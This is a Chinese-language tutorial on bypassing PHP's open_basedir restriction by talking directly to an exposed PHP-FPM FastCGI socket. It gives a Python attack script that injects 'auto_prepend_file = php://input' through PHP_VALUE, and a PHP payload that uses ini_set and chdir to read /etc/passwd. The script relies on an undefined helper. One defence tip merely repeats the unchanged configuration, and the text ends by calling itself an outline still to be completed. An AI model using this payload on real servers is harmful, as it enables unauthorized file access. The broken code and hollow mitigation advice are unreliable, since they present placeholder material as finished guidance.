怎么利用PHP-FPM實現繞過open_basedir

# 怎么利用PHP-FPM實現繞過open_basedir

## 前言

在PHP安全配置中，`open_basedir`是一個重要的安全機制，用于限制PHP腳本只能訪問指定目錄及其子目錄的文件。然而，在某些特定場景下，攻擊者可能利用PHP-FPM（FastCGI Process Manager）的特性繞過這一限制。本文將深入探討這一技術原理、利用方法及防御措施。

---

## 目錄
1. [open_basedir機制概述](#1-open_basedir機制概述)
2. [PHP-FPM基礎與工作原理](#2-php-fpm基礎與工作原理)
3. [繞過open_basedir的技術原理](#3-繞過open_basedir的技術原理)
4. [具體利用方法](#4-具體利用方法)
   - 4.1 [環境搭建與復現](#41-環境搭建與復現)
   - 4.2 [利用PHP-FPM的FastCGI協議](#42-利用php-fpm的fastcgi協議)
   - 4.3 [通過UNIX Socket通信](#43-通過unix-socket通信)
5. [漏洞利用的實戰案例](#5-漏洞利用的實戰案例)
6. [防御與緩解措施](#6-防御與緩解措施)
7. [總結](#7-總結)

---

## 1. open_basedir機制概述

`open_basedir`是PHP中用于限制文件系統訪問的配置指令，其作用包括：
- **目錄隔離**：限制PHP腳本只能訪問指定目錄及其子目錄。
- **安全防護**：防止目錄遍歷、文件包含等攻擊。

### 配置示例
```ini
open_basedir = /var/www/html:/tmp

限制范圍

• 影響函數：fopen()、file_get_contents()、include()等文件操作函數。
• 繞過難度：通常需要利用其他漏洞或服務配置不當。

2. PHP-FPM基礎與工作原理

PHP-FPM是PHP的FastCGI進程管理器，常用于Nginx等Web服務器。其核心特性包括： - 進程池管理：動態分配PHP解釋器進程。 - FastCGI協議：通過Socket（UNIX或TCP）與Web服務器通信。

典型配置（Nginx）

location ~ \.php$ {
    fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
    include fastcgi_params;
}

關鍵安全問題

• Socket權限：若UNIX Socket權限配置不當，可能導致未授權訪問。
• 動態請求處理：FastCGI協議允許傳遞任意PHP參數。

3. 繞過open_basedir的技術原理

核心思路

通過PHP-FPM的FastCGI協議直接傳遞惡意參數，繞過Web層的open_basedir限制。

技術依賴

1. PHP-FPM暴露：可通過UNIX Socket或TCP端口訪問。
2. 可控的FastCGI參數：如PHP_VALUE、PHP_ADMIN_VALUE。
3. 配置錯誤：如open_basedir未覆蓋/proc/self/等特殊路徑。

攻擊流程

1. 構造惡意FastCGI請求，修改PHP配置。
2. 利用chdir()和ini_set()動態調整open_basedir。
3. 訪問受限文件（如/etc/passwd）。

4. 具體利用方法

4.1 環境搭建與復現

目標環境

• PHP 7.4 + Nginx + PHP-FPM
• open_basedir = /var/www/html

漏洞驗證

檢查PHP-FPM Socket是否可寫：

ls -l /var/run/php/php7.4-fpm.sock

4.2 利用PHP-FPM的FastCGI協議

攻擊腳本（Python示例）

import socket

payload = """
<?php 
    ini_set('open_basedir', '..');
    chdir('/');
    ini_set('open_basedir', '/');
    echo file_get_contents('/etc/passwd');
?>
"""

fcgi_request = {
    'SCRIPT_FILENAME': '/var/www/html/index.php',
    'PHP_VALUE': 'auto_prepend_file = php://input',
    'REQUEST_METHOD': 'POST',
    'CONTENT_LENGTH': len(payload)
}

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect("/var/run/php/php7.4-fpm.sock")
sock.send(pack_fcgi_request(fcgi_request, payload))

4.3 通過UNIX Socket通信

關鍵步驟

1. 通過PHP_VALUE注入PHP配置。
2. 利用php://input執行任意代碼。
3. 遞歸跳出open_basedir限制。

5. 漏洞利用的實戰案例

案例1：通過TCP端口暴露PHP-FPM

• 場景：PHP-FPM監聽127.0.0.1:9000，但防火墻規則錯誤。
• 利用：直接發送FastCGI請求到9000端口。

案例2：Docker環境下的權限問題

• 場景：容器內PHP-FPM Socket權限為www-data:www-data。
• 利用：通過其他服務（如SSRF）寫入Socket。

6. 防御與緩解措施

安全配置建議

1. 限制PHP-FPM訪問：

   
   fastcgi_pass unix:/run/php/php-fpm.sock;
   

2. 嚴格設置open_basedir：

   
   open_basedir = /var/www/html:/tmp
   

3. 禁用危險函數：

   
   disable_functions = exec,passthru,shell_exec
   

監控與審計

• 日志記錄所有FastCGI請求。
• 定期檢查PHP-FPM進程權限。

7. 總結

本文詳細分析了通過PHP-FPM繞過open_basedir的技術原理、利用方法及防御措施。這種攻擊方式依賴于服務配置不當和協議特性，運維人員應重點關注： 1. PHP-FPM的隔離性。 2. open_basedir的覆蓋范圍。 3. 最小化FastCGI參數傳遞。

通過合理配置和持續監控，可以有效降低此類攻擊的風險。

附錄

• PHP官方安全指南
• FastCGI協議規范

”`

注：實際內容需根據技術細節補充完整代碼示例和調試過程，此處為提綱式框架。